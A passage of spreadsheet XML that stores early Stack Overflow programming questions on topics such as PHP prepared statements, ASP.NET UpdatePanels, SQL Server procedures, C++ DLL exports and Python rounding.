&lt;p&gt;We tried installing the PIA for Office without luck. Since Microsoft.mshtml.dll is a system dependent file we cannot include it in the package and re-distribute it. What would be the best way to deploy the application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to build MSBuild files (visual studio sln) from the command line in Mono?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to build Visual Studio solutions without having to fire up MonoDevelop?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do prepared statements work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing some DB routines and I'm using prepared statements.  My environment is PDO with PHP5.&lt;/p&gt;
&lt;p&gt;I understand prepared statements primarily provide a performance benefit, as well as some auxiliary bonuses such as not having to manually SQL-escape input data.&lt;/p&gt;
&lt;p&gt;My question is about the performance part.&lt;/p&gt;
&lt;p&gt;I have two implementations of a getPrice function below that takes a product id and returns its price.&lt;/p&gt;
&lt;p&gt;getPrice_A reuses the same PDOStatement object across subsequent calls within the same script execution.  Is this necessary or recommended?  If so, is there any way to avoid duplicating this extra code across every single get*() in every single model?&lt;/p&gt;
&lt;p&gt;getPrice_B creates a new PDOStatement object on every call.  Will the DBMS recognize this statement has already been prepared and still be able to skip some work?  In other words, does this implementation properly take advantage of the performance benefits of prepared statements?&lt;/p&gt;
&lt;p&gt;Having written all this out and read it over, I imagine getPrice_B is fine and getPrice_A is providing a negligible benefit on top of that, which may or may not be worth the extra complication.&lt;/p&gt;
&lt;p&gt;I'd still like to hear for sure from someone more knowledgable though.&lt;/p&gt;
&lt;p&gt;Assume that &lt;code&gt;$pdo&lt;/code&gt; is a valid, connected PDO object in the examples below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
class Product {
    static function &amp;amp;getPrice_A($id) {
        static $stmt;
        if (!$stmt) {
            $stmt = $pdo-&amp;gt;prepare('SELECT price FROM products WHERE id = ?');
        }
        $stmt-&amp;gt;execute(array($id));
        return $stmt-&amp;gt;fetchColumn(0);
    }
    static function &amp;amp;getPrice_B($id) {
        $stmt = $pdo-&amp;gt;prepare('SELECT price FROM products WHERE id = ?');
        $stmt-&amp;gt;execute(array($id));
        return $stmt-&amp;gt;fetchColumn(0);
    }
}
// example usage:
$price = Product::getPrice(4982);
echo "Product 4982 costs $price\n";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's a clean/simple way to ensure the security of a page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Supposing you have a form that collects and submits sensitive information and you want to ensure it is never accessed via insecure (non-HTTPS) means, how might you best go about enforcing that policy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Php function argument error suppression, empty() isset() emulation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm pretty sure the answer to this question is no, but in case there's some PHP guru&lt;/p&gt;
&lt;p&gt;is it possible to write a function in a way where invalid arguments or non existent variables can be passed in and php will not error without the use of &lt;code&gt;'@'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Much like empty and isset do. You can pass in a variable you just made up and it won't error.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ex:
empty($someBogusVar); // no error
myHappyFunction($someBogusVar); // Php warning / notice
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>NullReferenceException on instanciated object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a segment of code from an app I've inherited, a user got a Yellow screen of death:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Object reference not set to an instance of an object&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;on the line: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool l_Success ... 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I'm 95% sure the faulty argument is &lt;code&gt;ref l_Monitor&lt;/code&gt; which is very weird considering the object is instantiated a few lines before. Anyone have a clue why it would happen? Note that I have seen the same issue pop up in other places in the code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IDMS.Monitor l_Monitor = new IDMS.Monitor();
l_Monitor.LogFile.Product_ID = "SE_WEB_APP";
if (m_PermType_RadioButtonList.SelectedIndex == -1) {
    l_Monitor.LogFile.Log(
        Nortel.IS.IDMS.LogFile.MessageTypes.ERROR,
        "No permission type selected"
        );
    return;
}
bool l_Success = SE.UI.Utilities.GetPermissionList(
    ref l_Monitor,
    ref m_CPermissions_ListBox,
    (int)this.ViewState["m_Account_Share_ID"],
    (m_PermFolders_DropDownList.Enabled)
        ? m_PermFolders_DropDownList.SelectedItem.Value
        : "-1",
    (SE.Types.PermissionType)m_PermType_RadioButtonList.SelectedIndex,
    (SE.Types.PermissionResource)m_PermResource_RadioButtonList.SelectedIndex);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Database engines Comparison - Windows Mobile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the different database options on Windows Mobile available?
I have used CEDB and EDB for linear dataset needs.&lt;/p&gt;
&lt;p&gt;I have heard of SQL server 2005 Mobile edition. But what are the advantages over others (if there is any)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Python, how can you easily retrieve sorted items from a dictionary?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Dictionaries unlike lists are not ordered (and do not have the 'sort' attribute). Therefore, you can not rely on getting the items in the same order when first added. &lt;/p&gt;
&lt;p&gt;What is the easiest way to loop through a dictionary containing strings as the key value and retrieving them in ascending order by key?&lt;/p&gt;
&lt;p&gt;For example, you had this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;d = {'b' : 'this is b', 'a': 'this is a' , 'c' : 'this is c'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to print the associated values in the following sequence sorted by key:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this is a
this is b
this is c
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Algorithm to generate anagrams</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the best strategy to generate anagrams.&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;An anagram is a type of word play, the result of rearranging the letters
of a word or phrase to produce a new  word or phrase, using all the original
letters exactly once; 
ex.
&lt;/code&gt;&lt;/pre&gt;
  &lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;Eleven plus two&lt;/strong&gt; is anagram of &lt;strong&gt;&lt;em&gt;Twelve plus one&lt;/em&gt;&lt;/strong&gt; &lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;A decimal point&lt;/strong&gt; is anagram of &lt;strong&gt;&lt;em&gt;I'm a dot in place&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Astronomers&lt;/strong&gt; is anagram of &lt;strong&gt;&lt;em&gt;Moon starers&lt;/em&gt;&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;At first it looks straightforwardly simple, just to jumble the letters and generate all possible combinations. But what would be the efficient approach to generate only the words in dictionary.&lt;/p&gt;
&lt;p&gt;I came across this page, &lt;a href="http://lojic.com/blog/2007/10/22/solving-anagrams-in-ruby/"&gt;Solving anagrams in Ruby&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;But what are your ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Refresh all update panels on the page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code that modifies a value that several controls in other update panels are bound to. When this event handler fires, I'd like it to force the other update panels to refresh as well, so they can rebind.&lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
&lt;p&gt;Edit: &lt;/p&gt;
&lt;p&gt;To clarify, I have an update panel in one user control, the other update panels are in other user controls, so they can't see each other unless I were to expose some custom properties and use findControl etc etc...&lt;/p&gt;
&lt;p&gt;Edit Again:&lt;/p&gt;
&lt;p&gt;Here is what I came up with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void Update()
{
    recursiveUpdate(this); 
}
private void recursiveUpdate(Control control)
{
    foreach (Control c in control.Controls)
    {
        if (c is UpdatePanel)
        {
            ((UpdatePanel)c).Update();
        }
        if (c.HasControls())
        {
            recursiveUpdate(c);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I had 3 main user controls that were full of update panels, these controls were visible to the main page, so I added an Update method there that called Update on those three.&lt;/p&gt;
&lt;p&gt;In my triggering control, I just cast this.Page into the currentpage and called Update.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;AARRGGGG!&lt;/p&gt;
&lt;p&gt;While the update panels refresh, it does not call Page_Load within the subcontrols in them...What do I do now!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I maintain position of a DragPanelExtender across postbacks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I already found this article:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.dotnetcurry.com/ShowArticle.aspx?ID=181&amp;amp;AspxAutoDetectCookieSupport=1" rel="nofollow"&gt;http://www.dotnetcurry.com/ShowArticle.aspx?ID=181&amp;amp;AspxAutoDetectCookieSupport=1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But I've got a different situation. I am embedding some hiddenFields inside of the master page and trying to store the position of the dragPanel in those. &lt;/p&gt;
&lt;p&gt;I am using javascript to store the position of the dragPanel and then when the user clicks on a link, the new page is loaded, but the dragPanel is reset into the starting position.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there any easy way to do this?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Pseudocode:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;**this is in MasterPage.master**
function pageLoad()
{  
    // call the savePanelPosition when the panel is moved
    $find('DragP1').add_move(savePanelPosition);  
    var elem = $get("&amp;lt;%=HiddenField1.ClientID%&amp;gt;");   
    if(elem.value != "0")
    {
        var temp = new Array();
        temp = elem.value.split(';');
        // set the position of the panel manually with the retrieve value
        $find('&amp;lt;%=Panel1_DragPanelExtender.BehaviorID%&amp;gt;').set_location(new 
Sys.UI.Point(parseInt(temp[0]),parseInt(temp[1])));
    }
}      
function savePanelPosition()
{
    var elem = $find('DragP1').get_element();
    var loc = $common.getLocation(elem);
    var elem1 = $get("&amp;lt;%=HiddenField1.ClientID%&amp;gt;");
    // store the value in the hidden field
    elem1.value = loc.x + ';' + loc.y;
}        
&amp;lt;asp:Button ID="Button1" runat="server" Text="Button"/&amp;gt;
&amp;lt;asp:HiddenField ID="HiddenField1" runat="server" Value="0"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, &lt;strong&gt;HiddenField&lt;/strong&gt; is not visible in the redirected page, foo.aspx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bespoke SQL Server 'encoding' sproc - is there a neater way of doing this?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just wondering if there's a better way of doing this in SQL Server 2005.&lt;/p&gt;
&lt;p&gt;Effectively, I'm taking an originator_id (a number between 0 and 99) and a 'next_element' (it's really just a sequential counter between 1 and 999,999).
We are trying to create a 6-character 'code' from them. &lt;/p&gt;
&lt;p&gt;The originator_id is multiplied up by a million, and then the counter added in, giving us a number between 0 and 99,999,999.&lt;/p&gt;
&lt;p&gt;Then we convert this into a 'base 32' string - a fake base 32, where we're really just using 0-9 and A-Z but with a few of the more confusing alphanums removed for clarity (I, O, S, Z).&lt;/p&gt;
&lt;p&gt;To do this, we just divide the number up by powers of 32, at each stage using the result we get for each power as an index for a character from our array of selected character.&lt;/p&gt;
&lt;pre&gt;
Thus, an originator ID of 61 and NextCodeElement of 9 gives a code of '1T5JA9'
(61 * 1,000,000) + 9 = 61,000,009
61,000,009 div (5^32 = 33,554,432) =  1 = '1'
27,445,577 div (4^32 =  1,048,576) = 26 = 'T'
   182,601 div (3^32 =     32,768) =  5 = '5'
    18,761 div (2^32 =      1,024) = 18 = 'J'
       329 div (1^32 =         32) = 10 = 'A'
         9 div (0^32 =          1) =  9 = '9'
so my code is 1T5JA9
&lt;/pre&gt;
&lt;p&gt;Previously I've had this algorithm working (in Delphi) but now I really need to be able to recreate it in SQL Server 2005.  Obviously I don't quite have the same functions to hand that I have in Delphi, but this is my take on the routine. It works, and I can generate codes (or reconstruct codes back into their components) just fine.&lt;/p&gt;
&lt;p&gt;But it looks a bit long-winded, and I'm not sure that the trick of selecting the result of a division into an int (ie casting it, really) is necessarily 'right' - is there a better SQLS approach to this kind of thing?&lt;/p&gt;
&lt;pre&gt;
CREATE procedure dummy_RP_CREATE_CODE @NextCodeElement int, @OriginatorID int,
  @code varchar(6) output
as
begin
  declare @raw_num int;
  declare @bcelems char(32);
  declare @chr int;
  select @bcelems='0123456789ABCDEFGHJKLMNPQRTUVWXY';
  select @code='';
  -- add in the originator_id, scaled into place
  select @raw_num = (@OriginatorID * 1000000) + @NextCodeElement;
  -- now to convert this to a 6-char code
  -- 5^32
  select @chr = @raw_num / 33554432;
  select @raw_num = @raw_num - (@chr * 33554432);
  select @code = @code + SUBSTRING(@bcelems, 1 + @chr, 1);
  -- 4^32
  select @chr = @raw_num / 1048576;
  select @raw_num = @raw_num - (@chr * 1048576);
  select @code = @code + SUBSTRING(@bcelems, 1 + @chr, 1);
  -- 3^32
  select @chr = @raw_num / 32768;
  select @raw_num = @raw_num - (@chr * 32768);
  select @code = @code + SUBSTRING(@bcelems, 1 + @chr, 1);
  -- 2^32
  select @chr = @raw_num / 1024;
  select @raw_num = @raw_num - (@chr * 1024);
  select @code = @code + SUBSTRING(@bcelems, 1 + @chr, 1);
  -- 1^32
  select @chr = @raw_num / 32;
  select @raw_num = @raw_num - (@chr * 32);
  select @code = @code + SUBSTRING(@bcelems, 1 + @chr, 1);
  -- 0^32  
  select @code = @code + SUBSTRING(@bcelems, 1 + @raw_num, 1);
  -- that's it!
end;
&lt;/pre&gt;
&lt;p&gt;I'm not desperately concerned about optimisation unless this method is actually an order of magnitude (or so) worse than any alternative. &lt;/p&gt;
&lt;p&gt;The code only ever gets executed in small bursts, maybe generating 20 or 30 codes every 10 minutes or so. Because of the large range of numbers I don't want to pre-calculate the codes into a huge table (only small pockets of the overall code range will be used in any given installation).&lt;/p&gt;
&lt;p&gt;However, I'm sure there's probably a tidier way of achieving the same result - particularly those divisions and subtractions.&lt;/p&gt;
&lt;p&gt;Any constructive criticism, observations or suggestions would be most welcome. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Background" task in palm OS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a Palm OS app to check a web site every X minutes or hours, and provide a notification when a piece of data is available.  I know that this kind of thing can be done on the new Palm's - for example, my Centro can have email or web sites download when the application isn't on top - but I don't know how to do it.  Can anyone point me in the right direction?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>__doPostBack is not working in firefox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The __doPostBack is not working in firefox 3 (have not checked 2).  Everything is working great in IE 6&amp;amp;7 and it even works in Chrome??&lt;/p&gt;
&lt;p&gt;It's a simple asp:LinkButton with an OnClick event&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:LinkButton ID="DeleteAllPicturesLinkButton" Enabled="False" OnClientClick="javascript:return confirm('Are you sure you want to delete all pictures? \n This action cannot be undone.');" OnClick="DeletePictureLinkButton_Click" CommandName="DeleteAll" CssClass="button" runat="server"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The javascript confirm is firing so I know the javascript is working, it's specirically the __doPostBack event.  There is a lot more going on on the page, just didn't know if it's work it to post the entire page.&lt;/p&gt;
&lt;p&gt;I enable the control on the page load event.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I hope this is the correct way to do this, but I found the answer.  I figured I'd put it up here rather then in a stackoverflow "answer"&lt;/p&gt;
&lt;p&gt;Seems it had something to do with nesting ajax toolkit UpdatePanel. When I removed the top level panel it was fixed.&lt;/p&gt;
&lt;p&gt;Hope this helps if anyone else has the same problem.  I still don't know what specifically was causing the problem, but that was the solution for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking Inheritance with templates in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've a class which is a wrapper class(serves as a common interface) around another class implementing the functionality required. So my code looks like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;typename ImplemenationClass&amp;gt; class WrapperClass {
// the code goes here
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, how do I make sure that &lt;code&gt;ImplementationClass&lt;/code&gt; can be derived from a set of classes only, similar to java's generics&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;? extends BaseClass&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;syntax?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the possible mimetype hierachy of an email message?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with a snippet of code that recursively calls itself and tries to pull out a MIME Type part of &lt;code&gt;text/html&lt;/code&gt; from an email (if it exists) for further processing.&lt;/p&gt;
&lt;p&gt;The "text/html" could exist inside other content such as &lt;code&gt;multipart/alternative&lt;/code&gt;, so I'm trying to find out if there is a defined hierarchy for email MIME Types.&lt;/p&gt;
&lt;p&gt;Anybody know if there is and what it is? i.e. what types can parent other types?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When do function-level static variables get allocated/initialized?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm quite confident that globally declared variables get allocated (and initialized, if applicable) at program start time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int globalgarbage;
unsigned int anumber = 42;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But what about static ones defined within a function?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void doSomething()
{
  static bool globalish = true;
  // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When is the space for &lt;code&gt;globalish&lt;/code&gt; allocated? I'm guessing when the program starts. But does it get initialized then too? Or is it initialized when &lt;code&gt;doSomething()&lt;/code&gt; is first called?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Service that provides DVD Covers art?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any services that allow you to retrieve DVD cover information?  I'm working on a small WPF application where this functionality would be handy.  If a user inserts a DVD or types a title in, it'll automatically grab the cover art for that DVD.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find out where your PHP code is slowing down (Performance Issue)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my first question at SO.&lt;/p&gt;
&lt;p&gt;I have a internal application for my company which I've been recently ask to maintain. The applications is built in PHP and its fairly well coded (OO, DB Abstraction, Smarty) nothing WTF-ish. &lt;/p&gt;
&lt;p&gt;The problem is the applications is &lt;strong&gt;very slow&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;How do I go about finding out what's slowing the application down? I've optimized the code to make very few DB queries, so I know that it is the PHP code which is taking a while to execute. I need to get some tools which can help me with this and need to devise a strategy for checking my code.&lt;/p&gt;
&lt;p&gt;I can do the checking/strategy work myself, but I need more PHP tools to figure out where my app is crapping up. &lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't I delete this cookie?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, here is the 411 - I have the following event handler in my Global.asax.cs file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void Global_PostRequestHandlerExecute(object sender, EventArgs e)
{
   if (/* logic that determines that this is an ajax call */)
   {
      // we want to set a cookie
      Response.Cookies.Add(new HttpCookie("MyCookie", "true"));
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That handler will run during Ajax requests (as a result of the Ajax framework I am using), as well as at other times - the condition of the if statement filters out non-Ajax events, and works just fine (it isn't relevant here, so I didn't include it for brevity's sake).&lt;/p&gt;
&lt;p&gt;It suffices us to say that this works just fine - the cookie is set, I am able to read it on the client, and all is well up to that point.&lt;/p&gt;
&lt;p&gt;Now for the part that drives me nuts.&lt;/p&gt;
&lt;p&gt;Here is the JavaScript function I am using to delete the cookie:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function deleteCookie(name) {
   var cookieDate = new Date();
   cookieDate.setTime(cookieDate.getTime() - 1);
   document.cookie = (name + "=; expires=" + cookieDate.toGMTString());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, of course, at some point after the cookie is set, I delete it like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;deleteCookie("MyCookie");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Only, that doesn't do the job; the cookie still exists. So, anyone know why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DELETE Statement hangs on SQL Server for no apparent reason</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Solved, there was a trigger with a loop on the table (read my own answer further below).&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;We have a simple delete statement that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM tablename WHERE pk = 12345
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This just hangs, no timeout, no nothing.&lt;/p&gt;
&lt;p&gt;We've looked at the execution plan, and it consists of many lookups on related tables to ensure no foreign keys would trip up the delete, but we've verified that none of those other tables have any rows referring to that particular row.&lt;/p&gt;
&lt;p&gt;There is no other user connected to the database at this time.&lt;/p&gt;
&lt;p&gt;We've run DBCC CHECKDB against it, and it reports 0 errors.&lt;/p&gt;
&lt;p&gt;Looking at the results of &lt;em&gt;&lt;code&gt;sp_who&lt;/code&gt;&lt;/em&gt; and &lt;em&gt;&lt;code&gt;sp_lock&lt;/code&gt;&lt;/em&gt; while the query is hanging, I notice that my spid has plenty of PAG and KEY locks, as well as the occasional TAB lock.&lt;/p&gt;
&lt;p&gt;The table has 1.777.621 rows, and yes, pk is the primary key, so it's a single row delete based on index. There is no table scan in the execution plan, though I notice that it contains something that says &lt;em&gt;Table Spool (Eager Spool)&lt;/em&gt;, but says Estimated number of rows 1. Can this actually be a table-scan in disguise? It only says it looks at the primary key column.&lt;/p&gt;
&lt;p&gt;Tried DBCC DBREINDEX and UPDATE STATISTICS on the table. Both completed within reasonable time.&lt;/p&gt;
&lt;p&gt;There is unfortunately a high number of indexes on this particular table. It is the core table in our system, with plenty of columns, and references, both outgoing and incoming. The exact number is 48 indexes + the primary key clustered index.&lt;/p&gt;
&lt;p&gt;What else should we look at?&lt;/p&gt;
&lt;p&gt;Note also that this table did not have this problem before, this problem occured suddently today. We also have many databases with the same table setup (copies of customer databases), and they behave as expected, it's just this one that is problematic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subversion merge history visualisation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any utilities out there which can draw pictures of the merge history of a subversion repo - we always commit merges with a (fairly) consistent log message, and it would be handy to be able to automatically extract this info into a single picture that shows what branches occurred when, and what the state of merges is.&lt;/p&gt;
&lt;p&gt;I'm just interested in an informational tool, not something to help with actually performing merges.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I set a data breakpoint in runtime in System C (or in Plain Vanilla C++)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class in system-C with some data members as such:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long double x[8];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm initializing it in the construction like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (i = 0; i &amp;lt; 8; ++i) {
    x[i] = 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the first time I use it in my code I have garbage there.&lt;/p&gt;
&lt;p&gt;Because of the way the system is built I can't connect a debugger easily.  Are there any methods to set a data breakpoint in the code so that it tells me where in the code the variables were actually changed, but without hooking up a debugger?&lt;/p&gt;
&lt;p&gt;Edit:
@&lt;a href="#56477" rel="nofollow"&gt;Prakash&lt;/a&gt;: 
Actually, this is a typo in the &lt;em&gt;question&lt;/em&gt;, but not in my code...  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Foxpro App and removable drives problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a foxpro app, that contains hard coded path for icons and bitmaps. That's how foxpro does it and there is no way around it. And this works fine, except that when a removable drive has been used but is not connected, and when is connected windows assigns the same letter as hard coded path, when opening any form that contains such path, the following error message apears (&lt;strong&gt;FROM WINDOWS&lt;/strong&gt;, not fox):&lt;/p&gt;
&lt;p&gt;Windows-No disk
Exception Processing Message c0000012 Parameters .....&lt;/p&gt;
&lt;p&gt;Any help please
Nelson Marmol&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't access variable in C++ DLL from a C app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm stuck on a fix to a legacy Visual C++ 6 app. In the C++ DLL source I have put&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extern "C" _declspec(dllexport) char* MyNewVariable = 0;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which results in MyNewVariable showing up (nicely undecorated) in the export table (as shown by dumpbin /exports blah.dll). However, I can't figure out how to declare the variable so that I can access it in a C source file. I have tried various things, including&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_declspec(dllimport) char* MyNewVariable;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that just gives me a linker error:&lt;/p&gt;
&lt;p&gt;unresolved external symbol "__declspec(dllimport) char * MyNewVariable" (__imp_?MyNewVariable@@3PADA)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extern "C" _declspec(dllimport) char* MyNewVariable;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as suggested by Tony (and as I tried before) results in a different expected decoration, but still hasn't removed it:&lt;/p&gt;
&lt;p&gt;unresolved external symbol __imp__MyNewVariable&lt;/p&gt;
&lt;p&gt;How do I write the declaration so that the C++ DLL variable is accessible from the C app?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;The Answer&lt;/h2&gt;
&lt;p&gt;As identified by botismarius and others (many thanks to all), I needed to link with the DLL's .lib. To prevent the name being mangled I needed to declare it (in the C source) with no decorators, which means I needed to use the .lib file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get a fixed-position menu like slashdot's comment filtration menu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Slashdot has a little widget that allows you to tweak your comment threshold to filter out down-modded comments.  It will be in one place if you scroll to the top of the page, and as you scroll down, at some point, where its original home is about to scroll off the page, it will switch to fixed position, and stay on your screen.  (To see an example, click &lt;a href="http://news.slashdot.org/news/08/09/10/2257242.shtml" rel="nofollow"&gt;here&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;My question is, how can I accomplish the same effect of having a menu be in one place when scrolled up, and switch to fixed position as the user scrolls down?  I know this will involve a combination of CSS and javascript.  I'm not necessarily looking for a full example of working code, but what steps will my code need to go through?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a Flex debugger included in the sdk?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been writing Flex applications for a few months now and luckily have not needed a full debugger as of yet, so far I have just used a few Alert boxes...&lt;/p&gt;
&lt;p&gt;Is there an available debugger that is included in the free Flex SDK? I am not using FlexBuilder (I have been using Emacs and compiling with ant).&lt;/p&gt;
&lt;p&gt;If not, how do you debug Flex applications without FlexBuilder? (note: I have no intentions of using flexbuilder)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make dynamic content with dynamic navigation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating an ASP.NET web site where all pages hang off a database-driven tree-hierarchy.  Pages typically present HTML content.  But, some will execute programming.&lt;/p&gt;
&lt;p&gt;Examples: (1) a "contact us" form or (2) a report generator&lt;/p&gt;
&lt;p&gt;How should I represent/reference the programming within the database?  Should I have a varchar value of a Web User Control (.ascx) name?  Or a Web Form (.aspx) name?  Something else?  Or should it just be an integer or other such ID in a dictionary within my application?&lt;/p&gt;
&lt;p&gt;Can I make an ASP.NET Site Map Provider with this structure?&lt;/p&gt;
&lt;p&gt;See more information here: &lt;a href="http://stackoverflow.com/questions/56981/which-is-the-best-database-schema-for-my-navigation" rel="nofollow"&gt;Which is the best database schema for my navigation?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I start threads in plain C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have used fork() in C to start another process. How do I start a new thread?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>round() in Python doesn't seem to be rounding properly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The documentation for the &lt;a href="http://docs.python.org/lib/built-in-funcs.html"&gt;round()&lt;/a&gt; function states that you pass it a number, and the positions past the decimal to round. Thus it &lt;em&gt;should&lt;/em&gt; do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;n = 5.59
round(n, 1) # 5.6
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But, in actuality, good old floating point weirdness creeps in and you get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;5.5999999999999996
&lt;/code&gt;&lt;/pre&gt;
